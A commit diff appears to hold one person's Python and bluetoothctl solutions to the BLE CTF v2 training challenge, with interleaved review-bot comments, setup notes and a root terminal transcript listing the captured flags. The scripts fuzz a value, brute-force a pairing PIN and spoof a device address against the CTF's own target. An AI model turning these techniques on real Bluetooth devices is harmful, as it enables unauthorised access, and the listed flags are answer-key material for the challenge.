tidying for public release
1 parent 5a615e2 commit c047d5983239f5f857c98b6dde3d78b48cc94bae
root authored on 11 Mar 2022
Showing 11 changed files
16
README.md
BLE_CTF_V2
===============
 
BLE CTF v2
BLE CTF v2 (Infinity)
 
https://github.com/hackgnar/ble_ctf_infinity
 
Thanks @hackgnar for this fun CTF
 
I decided I wanted to try to complete this using python, this repo contains my solutions.
46
level_04.py 100644 → 0
#! /usr/bin/python
import binascii
import struct
import sys, os, time
import bluepy.btle as btle
'''
42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag!
44 0x2C NOTIFY WRITE
46 0x2E READ WRITE write here to goto to scoreboard
'''
 
deviceMAC = open('ctf_mac.txt').read()
p = btle.Peripheral(deviceMAC)
svc=p.getServiceByUUID(0x00FF)
print ("Attached to peripheral")
 
print("Loading level 04")
hex1 = binascii.unhexlify(str('%0*x' % (4,2)))
p.writeCharacteristic(0x30, hex1, withResponse=False)
 
password = "AABBCCDDEEFF"
 
sys.stdout.write("\rTrying: %s " % password.rstrip())
response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True)
while True:
if p.waitForNotifications(1.0):
# handleNotification() was called
continue
print "Waiting..."
#hex1 = p.readCharacteristic(0x2C)
#hex2 = binascii.b2a_hex(hex1)
#hexlif2 = str(binascii.unhexlify(hex2))
class MyDelegate(btle.DefaultDelegate):
def __init__(self, params):
btle.DefaultDelegate.__init__(self)
# ... initialise here
 
def handleNotification(self, cHandle, data):
# ... perhaps check cHandle
# ... process 'data'
print("Data: "+data)
 
p.disconnect()
3
lvl_01.py
import sys, os, time
import bluepy.btle as btle
'''
42 0x2A READ goodbye 👋
42 0x2A READ goodbye
 
fc3fd58dcdad9ab23fac
'''
 
hexlif2 = str(binascii.unhexlify(hex2))
print("Flag: %s" % hexlif2)
 
p.disconnect()
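Review bot: `hexlif2 = str(binascii.unhexlify(hex2))` yields the bare flag text only under Python 2; under Python 3 `str()` of a bytes object produces the `b'...'` repr, so the printed flag would come out wrapped in quotes. Decoding explicitly, `hexlif2 = binascii.unhexlify(hex2).decode("ascii")`, behaves the same on both interpreters (the flags in the transcript are plain hex, so ASCII is a safe assumption). `binascii` and `hex2` are not defined in the visible lines, so they presumably come from the part of the file above this hunk. The closing `p.disconnect()` is only reached on the success path; lvl_04.py in this same commit wraps its disconnect in `finally:`, and this script would benefit from the same pattern so a failed read does not leave the BLE connection open.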
1
lvl_02.py
print "Flag: %s" % hexlif2
break;
p.disconnect()
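Review bot: `print "Flag: %s" % hexlif2` is Python 2 print-statement syntax, whereas most of the other scripts in this commit (lvl_03.py, lvl_07.py) use `print(...)`, so this file is tied to Python 2 while its siblings are not; `print("Flag: %s" % hexlif2)` is valid on both. The `;` on `break;` is a stray C-ism and should be dropped. The loop this `break` belongs to starts outside the hunk, so I cannot see what condition leads here.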
13
lvl_03.py
# !!! make sure bluetoothd runs in --compat mode before executing this script !!!
def pair_with_pin(start_time, pin, time_limit=60): # int(time.time()), pin - \d{4}, time_limit - approximate pairing window time in seconds, it might take up to 2x (nested timeout conditions)
"exectutes pairing with entered PIN on bluetooth adapter side"
try:
 
newpid = os.fork()
if newpid == 0:
time.sleep(5)
'''
Start bluepy stuff
'''
subprocess.call(['hciconfig','hci0','down'])
 
deviceMAC = open('ctf_mac.txt').read()
p = btle.Peripheral(deviceMAC)
svc=p.getServiceByUUID("0000180d-0000-1000-8000-00805f9b34fb")
print ("Attached to peripheral")
print ("Attached to peripheral (pid 0)")
hex1 = p.readCharacteristic(0x2C)
hex2 = binascii.b2a_hex(hex1)
hexlif2 = str(binascii.unhexlify(hex2))
print("Flag: "+hexlif2)
p.disconnect()
exit()
else:
'''
Start actual pair stuff
Start actual pair stuff
'''
subprocess.call(['hciconfig','hci0','sspmode', '0'])
# bluetoothctl
print("Pairing")
child = pexpect.spawn('bluetoothctl')
child.logfile = open("/tmp/mylog", "w")
child.expect("#")
child.sendline('agent off') # might be unnecessary
child.sendline('discoverable on')
child.expect("discoverable on succeeded")
child.sendline('default-agent')
child.sendline('remove 3c:71:bf:f1:ef:c6')
child.sendline('scan on')
child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3")
child.sendline('pair 3c:71:bf:f1:ef:c6')
 
child.expect('Request passkey', timeout = time_limit ) # timeout <= PAIRING_TIME_LIMIT to keep some kind of logic
print ('Sending PIN: ' + pin)
trust_mac = 'trust ' + re.search(r'(?:[0-9a-fA-F]:?){12}.+$', child.before).group(0) # extract MAC from last line, one with 'Paired: Yes'
child.sendline(trust_mac) # optionally add device to trusted
child.expect('trust succeeded', timeout = 10)
pairing_status = True
child.sendline('remove 3c:71:bf:f1:ef:c6')
else: # i == 1
print('wrong PIN, retrying if time will allow')
except pexpect.EOF:
print ('!!!!!!!! EOF')
 
status = pair_with_pin(int(time.time()), str(BT_PIN), PAIRING_TIME_LIMIT)
if status == True:
print('Pairing successful')
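Review bot: The bluetoothctl side hard-codes the target as `3c:71:bf:f1:ef:c6` in the `remove`/`pair`/`remove` lines and expects `Device 3C:71:BF:F1:EF:C6 FLAG_3` from the scan, while the bluepy side in the forked child connects to whatever `ctf_mac.txt` holds; if the two disagree the script pairs with one device and reads the flag from another. Reading the MAC once before `os.fork()` (`target = open('ctf_mac.txt').read().strip()`) and building the bluetoothctl commands from it (`child.sendline('pair ' + target)`, likewise for `remove`, `trust` and the scan expectation) keeps both halves in sync and also removes the trailing newline that the unstripped `read()` would otherwise pass to `btle.Peripheral` if the file ends with one. `child.logfile = open("/tmp/mylog", "w")` writes the whole bluetoothctl session, including the PIN, to a fixed path in /tmp; the transcript in solutions.txt shows the script running as root, so a pre-planted symlink at that path could be followed on open — `tempfile.NamedTemporaryFile(prefix="bluetoothctl-", delete=False)` or a path under the script's own directory avoids that. The `else: # i == 1` branch refers to an `i` that is not assigned in the visible lines, so pair_with_pin's body is cut between hunks here.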
3
lvl_04.py
hexstr = str(hex).strip("0").upper()
#sys.stdout.write(" Response: " + hexstr) # for debugging
if(password.strip("0") != hexstr):
print(" Flag: %s" % notificationData.rstrip())
print("\nFlag: %s" % notificationData.rstrip())
exit()
else:
gotResponse = True
continue
print "Waiting..."
finally:
p.disconnect()
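Review bot: `hexstr = str(hex).strip("0").upper()` together with `password.strip("0") != hexstr` removes `0` characters from both ends of both values, so any `0` nibbles that are genuinely part of the candidate or the response are discarded along with what is presumably zero padding; a candidate and a response that differ only in a leading or trailing `0` then compare equal and the flag check is skipped. If the intent is to drop trailing padding, `rstrip("0")` on both sides is the narrower operation, and the local should not be named `hex` since it shadows the builtin (`resp_hex = str(hex_value).rstrip("0").upper()`). `print "Waiting..."` just before `finally:` is Python 2 statement syntax while the rest of this hunk uses `print(...)`, so the script only runs under Python 2. The loop and `try` this hunk belongs to start outside it.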
5
lvl_07.py
child.sendline('discoverable on')
child.expect("discoverable on succeeded")
child.sendline('default-agent')
child.sendline('remove 3c:71:bf:f1:ef:c6')
child.sendline('scan on')
child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3")
child.sendline('pair 3c:71:bf:f1:ef:c6')
 
i = child.expect('Paired: yes', timeout = time_limit)
if i == 0: # found 'Paired: yes' == successful pairing
p = btle.Peripheral(deviceMAC)
print ("[bp] Attached to peripheral")
 
print("[++] Loading level 07")
hex1 = binascii.unhexlify(str('%0*x' % (4,3)))
hex1 = binascii.unhexlify(str('%0*x' % (4,7)))
p.writeCharacteristic(0x30, hex1, withResponse=False)
 
p.disconnect()
 
hexlif2 = str(binascii.unhexlify(hex2))
print("[==] Flag: "+hexlif2)
p.disconnect()
exit()
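Review bot: The scan expectation `child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3")` and the hard-coded `3c:71:bf:f1:ef:c6` in `remove`/`pair` look carried over from lvl_03.py, while the bluepy side connects to `deviceMAC`; in a level-07 script the `FLAG_3` device name is questionable, and if the target advertises a different name the `expect` will time out (the `[sp] Timeout` line in the solutions.txt transcript may be exactly this). Building these lines from the same `deviceMAC` value (`child.sendline('pair ' + deviceMAC.strip())`) and matching on the address alone (`child.expect("Device " + deviceMAC.strip().upper())`) would remove the duplication and the stale name. `p.disconnect()` is called at the end of the level-load block and again after the flag is printed, and `hex2` is unhexlified after the first disconnect with no read visible in between; these lines probably belong to different hunks, so the read is presumably in the omitted stretch. The enclosing function starts outside the hunk.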
11
lvl_08_incomplete.py 0 → 100644
#! /usr/bin/python
import binascii
import struct
import sys, os, time
import bluepy.btle as btle
'''
42 0x2A READ Brute force my pin. Start from 0000. Try using bluetoothctl & expect
 
'''
11
lvl_09_incomplete.py 0 → 100644
#! /usr/bin/python
import binascii
import struct
import sys, os, time
import bluepy.btle as btle
'''
42 0x2A READ Im advertising the flag
 
'''
8
notes.txt
Setup:
$> rfkill unblock all
$> btmgmt le on
$> systemctl start bluetooth
$> hciconfig hci0 up
$> hciconfig hci0 reset
$> hcitool lescan
Search for MAC addresses around:
hcitool lescan
enumerate the MAC
bleah -b 11:22:33:44:55:66 -e
65
solutions.txt 0 → 100644
root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_00.py
Attached to peripheral
Sending "12345678901234567890" to 0x2e
Done
 
root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_01.py
Attached to peripheral
Loading level 1
Reading value
Flag: eca7d1f3cf60a8b5344a
 
root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_02.py
Attached to peripheral
Loading level 02
Password Found: password1234
Flag: eca7d1f3cf60a8b5344a
 
/***
* nano /etc/systemd/system/dbus-org.bluez.service
* set: ExecStart=/usr/lib/bluetooth/bluetoothd --compat
*/
root@NanoyPiBenchDash:/opt/BLE_CTF_V2# systemctl daemon-reload
root@NanoyPiBenchDash:/opt/BLE_CTF_V2# service bluetooth restart
root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_03.py
Attached to peripheral
Loading level 03
Pairing
Attached to peripheral (pid 0)
Sending PIN: 0000
Flag: b46fa238cf820d0f60c1
Pairing successful
 
root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_04.py
Attached to peripheral
Loading level 04
Generating wordlist
Trying: AABBC8DDEEFF
Flag: f401f21d02fdd0a4fc00
 
root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_05.py
Attached to peripheral
Loading level 05
Sending "121212121222" to 0x2c
Reading value
Flag: 84cf61c35b2d9c92217d
 
root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_06.py
Attached to peripheral
Loading level 06
Manufacturer: Cypress Semiconductor Corporation (305)
Device address: B8:27:EB:81:86:56 (Raspberry Pi Foundation)
New BD address: 11:22:33:44:55:66
Address changed - Reset device now
Reading value
Flag: 1dec0e624f2ecf1513dc
 
root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_07.py
[bp] Attached to peripheral
[++] Loading level 07
[sp] starting bluetoothctl
[sp] Timeout
[sp] Pairing successful
[bp] Attached to peripheral
[==] Flag: a16ee1a4001c66c3a670
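Review bot: The lvl_01.py and lvl_02.py runs in this transcript report the same flag, `eca7d1f3cf60a8b5344a`, which for two different levels suggests lvl_02.py reads the characteristic before the level switch takes effect (or reads the wrong handle) rather than that the CTF reuses a flag; worth re-running before this is cited as a solution. For a commit titled "tidying for public release", the transcript also publishes the bench host name `NanoyPiBenchDash`, the adapter's real hardware address `B8:27:EB:81:86:56`, and the fact that every script was run as root — none of which a reader needs, and the root requirement deserves a one-line note in README.md instead (it follows from `hciconfig`/`bluetoothctl` and the `--compat` service edit, not from the Python itself). Redacting the prompt to `$ ./lvl_00.py` style lines would keep the useful output and drop the rest.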